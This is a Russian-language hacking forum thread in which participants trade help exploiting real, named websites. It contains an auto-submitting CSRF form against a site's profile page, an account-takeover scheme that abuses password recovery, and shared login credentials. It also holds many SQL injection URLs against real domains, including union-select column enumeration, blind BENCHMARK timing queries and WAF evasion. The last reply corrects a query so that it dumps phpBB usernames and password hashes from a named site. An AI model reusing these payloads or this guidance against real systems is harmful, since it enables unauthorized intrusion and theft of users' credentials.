Ваши вопросы по уязвимостям.

вот сама форма :

PHP:

<form method="post" action="/profile" class="reg_form">
                
                
                
            <table>
<tbody><tr> 
<td>
                  <label><p><font color="black">Имя 
                
                 <input name="name" type="text" value="nikitos2020">
        </font></p></label></td><td></td><td>
                  <label><p><font color="black">PM кошелек 
                
                 <input name="pm_account" type="text" value="U3278335">
                
                </font></p></label></td>


        </tr><tr>

        <td>

                  <label><p><font color="black">Фамилия 
                
                 <input name="lastname" type="text" value="dfcer">
            </font></p></label></td>
        <td></td>
<td>

                  <label><p><font color="black">Skype 
               
                 <input name="skype" type="text" value="">
                </font></p></label></td>
                    </tr>

            
                


<tr>
    <td>
                  <label><p><font color="black">E-mail 
                
                 <input name="email" type="text" value="[email protected]" readonly="1" class="readonly">


                    </font></p></label></td>  <td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
    <td>
                  <label><p><font color="black">ICQ 
                
                 <input name="icq" type="text" value="">
            </font></p></label></td>
            </tr>
            
            
</tbody></table>
            
            
            
            

                
                  
                  
            
                 
                 
                 
&nbsp;&nbsp;&nbsp;<table>
<tbody><tr> 
<td>
                  <label><p><font color="black">Старый пароль 
                
                 <input name="pass_old" type="text"></font></p></label></td><td>
</td><td>
                <label><p><font color="black">Новый пароль 
               
                 <input name="pass" type="text">
                </font></p></label></td><td>&nbsp;&nbsp;&nbsp;</td><td>
                  <label><p><font color="black">Повторите новый пароль 
                
                 <input name="pass2" type="text">
                 </font></p></label></td>
                 
</tr><tr><td></td>
<td><input type="submit" name="done" value="Сохранить" class="button"></td>
</tr>
</tbody></table>
        
                
                
                 </form>



 

Можно тестовый аккаунт, обязательно посмотрю? Судя по этой форме, что вы скинули, при отсутствии защиты, статически будет это так:

PHP:

<form method="post" action="http://euroits.com/profile" id="test" accept-charset="UTF-8">
    <input name="name" value="Ваш текст"/>
    <input name="pm_account" value="Ваш текст"/>
    <input name="lastname" value="Ваш текст"/>
    <input name="skype" value="Ваш текст"/>
    <input name="email" value="Ваш текст"/>
    <input name="icq" value="Ваш текст"/>
    <input name="pass_old" value="Ваш текст"/>
    <input name="pass" value="Ваш текст"/>
    <input name="pass2" value="Ваш текст"/>
    <input name="done" value="Сохранить"/>
</form>
<script>
    document.getElementById('test').submit(); 
</script>  


Предполагаю, что возможно сменить пароль не задавая старый нереально.

 

)) так в этом и фишка бро) нужно всеголишь изменить mail, и начинаются танцы))) как только у жертвы поменяется почта, ты заходишь на сайт жмём "востоновить" после вводим мэил который поменялся у жертвы... к нам на почту приходит его ник и пароль (который стоит в настоящие время)) то есть пароль не сбрасывается а отправляется существующий в настоящий момент)) ах да вот аккаунт зарегал попробуй: логин: XAMEHA пароль: qwe123

 

Но ведь этот ресурс не позволяет менять мыло даже у себя, оно не сохраняется в профиле

Кошелек, контакт, данные - да, а вот mail - нет. Возможно вам стоит выполнять какие-то другие действия?

 

В общем есть сукля, но раскрутить её не получается

Code:

http://shimanomarket.com.ua/products.php?category=53&page=0&special=show&order=-dprice%29%27+union+select+1,2,3+--+

и вторая

Code:

http://www.aerosol.com.ua/products.php?id=3%27

но если дописать union+select выбьет = Not Acceptable

 

http://linzapro.ru/feedback/
пост
fsearch=777[SQL]&subsearch=1
не буду врать - нашел через софт, но руками никак...!

 

Что за софт?

Блиндом крутится

http://linzapro.ru/bigpic_log.php?pid=109452%20and%20if%28Length%28%28select%20distinct%20table_name%20from%20%60information_schema%60.tables%20where%20table_schema%3D0x6C696E7A6170726F%20limit%201%2C1%29%29%3D21%2CBENCHMARK%28267134%2CMD5%280x41%29%29%2C0%29

 

Или так: post-запрос

 

Отсечь часть UPDATE запроса

Добрый день,

на одном сайте столкнулся с заполнением анкеты, и в одном поле, случайно задал вместе с числом знак %, после чего при сохранения профиля мне выдало следующее:

Code:

You have an error in your SQL syntax; check the manual that corresponds
 to your MySQL server version for the right syntax to use
 near ';, abgl= 2, a_t = 2 WHERE id = 87637 AND user_id = 114239' at line 1 ---->

 UPDATE you_profil SET t_raum_v= '09/2009 - 09/2012', zeitraum_von = '2009-9-00',
 t_raum_b= '2012-9-00', beruf = '2', a_ort= 'Harward', e_znote= 'Bachelor',
 notiz= 'Some text', note = 1.9%;, abgl= 2, a_t= 2 WHERE id = 87637 AND user_id = 114239

Пробывал экранировать остаток запроса после поля note = 1,9%-- и note = 1,9/** , но не выходит. Подскажите как можно закомментировать остаток запроса, что бы он не исполнялся. Вместо него хочу добавить свой запрос.

 

никак...!

 

Приветствую всех.
При запросе site.ru:3306 скачивается файл а в нем версия мускуля
F 5.0.32-Debian_7etch5 нz J>8>m**0 ,ў! U:a\)VU*mg@F 
яBad handshake
настройки мускула неправильные?
дальше что нить можно с этим сделать?

есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?

 

Привязка пользователя к конкретному хосту вполне может быть, или там у каждого пользователя хост равен localhost. Если там нет phpmyadmin'a, или ему подобному, подключиться удаленно не получится.

 

Я уже задолбался подбирать столбцы

Code:

http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27

народ, скажите что не так

 

SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1

 

Разочарование при вводе version() - I don't like you...

 

хакир ну и чо ? то что фильт на version() это еще ничего не значит, самое главное то нормально выводится. и саму версию бд можно вывести так @@version

 

Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9+from+phpbb_users

Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы

5.0.92-log:trunovc7_tr@localhost:trunovc7_loy

 

Нашел единственную уязвимость на сайте.Начал анализ
Нашел мне такую базу данных, в хавидж жму Get tables внутри ничего не вылезает, вот название Current DB: }NLrxf}x{f}ffw иероглифы какие то и скобки.Скажите что делать?

 

HTML:

http://www.trunov.com/news.php?newsid=-237+UNION+SELECT+1,CONCAT_ws(0x3a,username,user_password),3,4,5,6,7,8,9+FROM+trunovc7_forum.phpbb_users+LIMIT+1,1--&page=1

 

Зачем скрывать доменное имя, если в большинстве случаев оно схоже с именем юзера или базы?! В Вашем случае, я так понимаю, http://www.trunov.com

Далее несложно определить, что курутиться несколько баз данных:
помимо information_schema и trunovc7_loy есть еще trunovc7_forum, которая и содержит необходимую Вам таблицу, то есть запрос примет вид ...from trunovc7_forum.phpbb_users.

И еще момент: колонки с названием password нет в таблице phpbb_users, есть user_password.

Итог: